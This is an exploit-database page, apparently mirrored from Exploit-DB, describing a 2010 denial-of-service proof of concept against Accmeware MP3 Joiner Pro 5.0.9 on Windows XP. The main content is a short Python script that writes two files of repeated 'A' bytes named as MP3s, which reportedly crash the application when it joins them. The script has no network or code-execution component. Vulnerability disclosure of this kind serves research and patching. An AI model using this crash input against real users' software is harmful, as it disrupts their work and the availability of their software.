header-logo
Suggest Exploit
vendor:
MP3 Joiner Pro
by:
0v3r
7,5
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: MP3 Joiner Pro
Affected Version From: 5.0.9
Affected Version To: 5.0.9
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3 EN (VirtualBox)
2010

Accmeware MP3 Joiner Pro 5.0.9 DoS PoC

The application crashes when it tries to join two malformed mp3 files. A PoC code is provided which creates two malformed mp3 files and when inserted into the application, it crashes.

Mitigation:

N/A
Source

Exploit-DB raw data:

# Exploit Title: Accmeware MP3 Joiner Pro 5.0.9 DoS PoC
# Date: 12/20/2010
# Author: 0v3r
# Software Link: http://www.mp3-joiner.net/Files/MJPSetup.exe
# Version: 5.0.9
# Tested on: Windows XP SP3 EN (VirtualBxox)
# CVE: N/A

# The application crashes when trys to join two malformed mp3 files

#!/usr/bin/python

buff 	 = "\x41" * 1000

try:
 	f = open("1.mp3",'w')
	f.write(buff)
	f.close()
	f = open("2.mp3",'w')
        f.write(buff)
        f.close()

	print "Vulnerable files created!..."
	print "Insert mp3 files into the application and select join\n"
except:
	print "Error occured!"